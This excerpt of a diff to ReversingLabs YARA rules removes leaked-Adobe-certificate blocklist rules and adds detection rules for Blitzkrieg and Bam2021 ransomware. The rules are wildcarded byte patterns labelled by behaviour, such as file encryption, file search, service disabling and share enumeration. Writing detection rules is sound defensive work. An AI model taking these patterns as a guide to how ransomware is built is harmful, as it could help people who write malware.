EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 56 68 ?? ?? ?? ?? + 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B F0 + 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 56 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 50 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? + ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 8D B5 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B + 00 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 B5 ?? ?? ?? ?? + 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? + ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B 95 ?? ?? ?? ?? 6A ?? 8D + 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 52 51 50 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? + 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? + ?? ?? 8B E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="db:b1:4d:cf:97:3e:ad:a1:4e:ce:7e:a7:9c:89:5c:11" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_F8C2239De3977B8D4A3Dcbedc9031A51 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Blitzkrieg : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Blitzkrieg ransomware." author = "ReversingLabs" - id = "3e102d0a-30e3-5f0a-9b67-a5fd15117e69" - date = "2023-11-08" - modified = "2023-11-08" + id = "078f7f9d-edd4-52b4-a30e-e968542da95c" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1272-L1288" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "aa4f39790bc58b0a50e05e7670abad654d7f3d73e500bd5f054fece4a979ebfa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Blitzkrieg.yara#L1-L127" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "22dd16c886a1982186fe927e633be9951da7d7e664e877e11fa976696b2bc86f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Blitzkrieg" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="f8:c2:23:9d:e3:97:7b:8d:4a:3d:cb:ed:c9:03:1a:51" and 1341792000<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Caad8222705D3Fb3430E114A31C8C6A4 : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "d95b5e25-679c-57f8-b790-8f5633a23e4b" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1290-L1306" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "35c4f46322da4f5b9f938c1098c8e57effc8abfc03db865190c343df7b8990ea" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? + 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? + ?? 64 FF 30 64 89 20 8B 45 ?? 8B 40 ?? 8B 10 FF 52 ?? 8B F0 4E 83 FE ?? 0F 8C ?? ?? + ?? ?? 8B 45 ?? 8B 48 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 A0 ?? ?? ?? ?? 88 + 43 ?? C6 43 ?? ?? 8D 4D ?? 8B 45 ?? 8B 40 ?? 8B D6 8B 38 FF 57 ?? 8B 55 ?? 8B C3 E8 + ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 + 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 89 0C + 82 4E 83 FE ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 84 C0 74 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $search_files_p1 = { + E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? B2 ?? A1 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? F6 40 ?? ?? 74 ?? FF 45 ?? 8B 45 ?? F6 40 + ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? + 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 52 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? + E8 ?? ?? ?? ?? 85 C0 7E ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 8B 52 ?? + 48 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 40 80 7C 02 ?? ?? 74 ?? 8D 85 ?? ?? ?? + ?? 8B 55 ?? 8B 4D ?? 8B 49 ?? 4A 85 C9 74 ?? 3B 51 ?? 72 ?? E8 ?? ?? ?? ?? 42 8A 54 + 11 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 55 ?? 8B 45 + ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 45 ?? FF 4D ?? 75 ?? 8B 45 ?? 8B 10 FF + 52 ?? 48 85 C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + 8B 55 ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? + ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 + ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? + ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 ?? B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 85 C0 7F ?? 8B 45 ?? 8B 40 ?? 50 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B D8 B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 + } + $search_files_p2 = { + E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 8B 4B + ?? 89 0C 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8B + 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 + 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? + EB ?? FF 45 ?? FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? + 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 85 ?? ?? ?? ?? + 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? + 8B 48 ?? 8B 45 ?? E8 + } + $disable_services_p1 = { + E8 ?? ?? ?? ?? 8B F0 BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + } + $disable_services_p2 = { + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 + FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA + ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 6A ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 33 D2 E8 ?? ?? ?? ?? 33 C0 5A + 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="ca:ad:82:22:70:5d:3f:b3:43:0e:11:4a:31:c8:c6:a4" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (( all of ($disable_services_p*)) and ( all of ($search_files_p*)) and ($encrypt_files)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B191812516E6618D49E6Ccf5E63Dc343 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Bam2021 : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Bam2021 ransomware." author = "ReversingLabs" - id = "8f316011-9a29-5366-a26a-1fe20651ef17" - date = "2023-11-08" - modified = "2023-11-08" + id = "31ae99e3-223c-51fb-97c1-353ff063057f" + date = "2021-09-17" + modified = "2021-09-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1308-L1324" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "40c03e683b4b8e8a23ca84da7dfd3bd998d3708b27b7df7a22f25fb364c3a69b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Bam2021.yara#L1-L167" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5b717510991b78f07806e88f3dfe1c27d6ec1ec21af61a7c4f1edf7c915785d5" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Bam2021" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="b1:91:81:25:16:e6:61:8d:49:e6:cc:f5:e6:3d:c3:43" and 1341792000<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Ba7Fb8Ee1Deff8F4A1525E1E0580057 : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "af912c64-334d-51f5-8ca4-707fcec512ba" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1326-L1342" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "324157b9fec2653cb8874c7a1a5b6e39b121992cd52856b8c4a2a8b7cee86a69" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $enum_shares = { + 83 EC ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? FF D5 8B 74 24 ?? 6A ?? 56 C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 + ?? 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 89 06 33 C0 5F 5E + 5D 5B 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 + FF 75 ?? 89 06 8B 44 24 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8D 4C 24 + ?? 51 57 8D 54 24 ?? 52 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? ?? ?? 33 DB 39 5C + 24 ?? 76 ?? 8D 77 ?? 90 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 + 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 06 50 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 + ?? FF D5 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 3E E8 ?? ?? + ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 46 ?? 83 E0 ?? 3C ?? + 75 ?? 8B 4C 24 ?? 8B 44 24 ?? 51 8D 56 ?? 52 50 E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 + ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 74 ?? 56 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 31 57 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 52 E8 ?? ?? ?? + ?? 8B F0 85 F6 74 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 30 33 + C0 5F 5E 5D 5B 83 C4 ?? C2 + } + $find_files_p1 = { + 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 + ?? 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 + ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 ?? 66 8B 50 ?? 66 3B 51 + ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C5 0F 84 ?? + ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 + ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 + 83 D8 ?? 3B C5 0F 84 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8C 24 + ?? ?? ?? ?? 51 BB ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 9C 24 ?? ?? + ?? ?? 8D 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 8D 8C 24 + ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? 8B 54 24 ?? + 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 66 89 44 24 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? + 83 C4 ?? 8B 54 24 ?? 8B 44 24 ?? 42 3B C2 77 ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 + ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 34 0A 3B C6 77 ?? 2B F0 8B 44 24 ?? 39 2C B0 75 ?? 6A + ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 04 B1 8B 54 24 ?? 8B 0C B2 89 4C 24 ?? 89 + } + $find_files_p2 = { + 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 3B CD 74 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 89 69 ?? 6A + ?? 66 89 41 ?? 55 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 44 + 24 ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ?? + ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 47 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? + ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 16 52 8D 84 24 ?? + ?? ?? ?? 50 FF D3 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? E9 ?? ?? ?? ?? 57 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 94 24 ?? ?? ?? ?? 2B D0 0F + B7 08 66 89 0C 02 83 C0 ?? 66 3B CD 75 ?? 33 C0 EB ?? 8D A4 24 ?? ?? ?? ?? 8D 49 ?? + 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 33 C0 8D 9B + ?? ?? ?? ?? 0F B7 88 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 8B + 5C 24 ?? 6A ?? B9 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8D 8C + 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 + } + $encrypt_files_p1 = { + 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? + ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? + ?? ?? 64 A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 DB 3B C3 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 + 83 C4 ?? 3B F3 74 ?? 68 ?? ?? ?? ?? 8D 46 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 + EB ?? 33 C0 A3 ?? ?? ?? ?? 8D 4C 24 ?? 51 8B F8 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 33 D2 53 89 9C 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 